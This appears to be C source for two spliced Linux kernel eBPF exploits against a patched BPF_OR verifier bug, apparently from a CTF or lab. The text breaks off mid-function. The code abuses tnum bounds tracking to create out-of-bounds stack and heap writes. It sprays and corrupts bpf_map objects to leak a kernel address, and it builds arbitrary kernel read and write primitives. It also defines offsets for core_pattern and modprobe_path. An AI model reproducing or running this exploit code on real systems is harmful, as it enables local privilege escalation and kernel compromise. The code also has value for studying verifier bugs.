      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  // Attach the filter and send any packet through to trigger it once.
  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  write(socks[1], "Hello", 5);

  bpf_map_lookup(mapfd, 0, &val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

// Kernel address of our struct bpf_map, filled in by leak_bpf_map_addr().
uint64_t bpf_map_addr = 0;

// Driver for the leak-only PoC: create the map, leak its kernel address,
// and print it.  (Removed an unused 64 KiB stack buffer `verifier_log`
// that was never referenced in this function.)
int main() {
  srand(time(NULL));

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  // The map element sits 0x110 bytes past the struct (per the offset used
  // inside leak_bpf_map_addr()).
  printf("[+] bpf_map_addr: 0x%016lx, &bpf_map_elem = 0x%016lx\n", bpf_map_addr,
         bpf_map_addr + 0x110);

  return 0;
}

Leak addr of struct bpf_map using oob read & heap spray

      // Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    <               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    >               // `scalar_min_max_or` will handler the case
//    >               //__mark_reg32_known(dst_reg, var32_off.value);

#include <asm-generic/socket.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "bpf_insn.h"

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

// Show a prompt and block on stdin — debugging aid.
void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

// Print msg plus the current errno description and abort the exploit.
void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue("Press enter to exit...");
  exit(-1);
}

// Thin wrapper around the raw bpf(2) syscall.
int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

// Create a BPF_MAP_TYPE_ARRAY map with int keys; dies on failure.
int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &attr);
  if (map_fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }

  return map_fd;
}
// Store *pval into map slot `key` (BPF_ANY); dies on failure.
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (res < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }

  return res;
}
// Read map slot `key` into *pval; returns the raw bpf(2) result
// (callers check it themselves).  flags are ignored by lookup.
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

// Map whose element is the OOB-write source, picked from the spray below.
int mapfd;
// 0x100 sprayed BPF array maps used to groom the kernel heap.
int map_spray_fd[0x100];
// Heap-groom and corrupt a neighboring bpf_map.
// Sprays 0x100 BPF array maps so that map_spray_fd[0x81] (chosen as the
// OOB source) is likely adjacent in the heap to another sprayed map.  The
// verifier bug (see inline tnum comments) lets skb_load_bytes() write 0xf1
// runtime bytes into the 8-byte map element, overflowing into the next
// object; the final payload byte (0xa0 - 8) overwrites the low byte of the
// adjacent bpf_map's ->ops pointer — presumably shifting the ops table by
// -8 so a call through one slot dispatches the previous entry (e.g.
// update_elem -> lookup_elem, per the idx macros above and the comments in
// find_corrupted_map_and_leak_bpf_map_addr()); confirm against the target
// kernel's bpf_map_ops layout.
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts("[*] Spray struct bpf_map...");
  for (int i = 0; i < sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf1 - 1),  // arg4 = (0xf1-1) * arg4 == (actual_val=0xf1-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf1; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf1; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map->ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  memset(buf, 'a', 0xf0);
  buf[0xf0] = 0xa0 - 8;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

// fd of the sprayed map whose struct bpf_map->ops pointer was corrupted by
// make_corrupted_map(); 0 means none was found.
int corrupted_map_fd;
// Kernel address of the corrupted struct bpf_map, derived from the leaked
// map-value pointer in find_corrupted_map_and_leak_bpf_map_addr().
uint64_t bpf_map_addr;
// Scan every sprayed map to identify the one whose ->ops got corrupted.
// For each candidate, a BPF program calls map_update_elem() on it; on the
// corrupted map that ops slot dispatches differently and returns a non-zero
// kernel pointer, which the program stashes into `mapfd`'s value slot so
// userspace can read it back.  The leaked pointer - 0x110 is recorded as
// the address of the struct bpf_map (presumably the pointer lands 0x110
// into the allocation — verify against the target kernel's layout).
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  // map_spray_fd holds ints (4 bytes each), so sizeof/4 == entry count.
  for (int i = 0; i < sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &map_val);
    // printf("ret: 0x%x, val: 0x%lx\n", ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&key) = fp-0x10 <- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&val) = fp-0x10 <- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        // r0 (0 for a healthy map, a kernel pointer for the corrupted one)
        // is spilled to fp-0x18 so it can be exfiltrated through `mapfd`.
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&key) = fp-0x10 <- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&val) = fp-0x18 <- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)"GPL v2",
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
    if (progfd < 0) {
      puts("============[failed reason]============");
      printf("%s\n", verifier_log);
      fatal("bpf(BPF_PROG_LOAD)");
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal("socketpair");
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
      fatal("setsockopt");
    }

    // Any datagram triggers the attached filter once.
    write(socks[1], "Hello", 5);

    // NOTE(review): `val` stays uninitialized if bpf_map_lookup() fails;
    // consider initializing it to 0 before the lookup.
    uint64_t val;
    bpf_map_lookup(mapfd, 0, &val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      bpf_map_addr = val - 0x110;
      corrupted_map_fd = cur_map_fd;
      // Keep the corrupted map's fd open; keep scanning the rest.
      continue;
    }

    close(cur_map_fd);
  }
}

// Arbitrary 64-bit kernel write: *(u64*)addr = val.
// The BPF program below exploits the patched BPF_OR verifier handling to
// build register r8 whose runtime value (1) is larger than what the
// verifier's bounds tracking believes.  The multiply/add chain then yields
// a skb_load_bytes() length the verifier tracks as 1 but that is 0x10 at
// runtime: the first copy therefore overruns fp-0x20 and overwrites the
// spilled stack pointer at fp-0x18 with the attacker-supplied `addr`
// (packet qword 1).  The second skb_load_bytes() writes packet qword 2
// (`val`) through that pointer.
uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  // The program reads map value [0]; seed it with 1 so the tnum games below
  // behave as annotated.
  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      // Runtime length 0x10 overruns fp-0x20..fp-0x19 and replaces the
      // spilled pointer at fp-0x18 with packet qword 1 (== addr).
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  // Packet layout consumed by the program: [marker][target addr][value].
  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  // buf[] is never modified by this function; the marker qword is returned
  // only as a convenience value.
  return buf[0];
}
// Arbitrary 64-bit kernel read: returns *(u64*)addr.
// Same verifier/runtime length mismatch as aaw64(): the OOB
// skb_load_bytes() overwrites the trusted pointer spilled at fp-0x18 with
// the attacker-supplied `addr`; map_update_elem() then copies 8 bytes from
// that address into `mapfd`'s value slot, which userspace reads back.
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
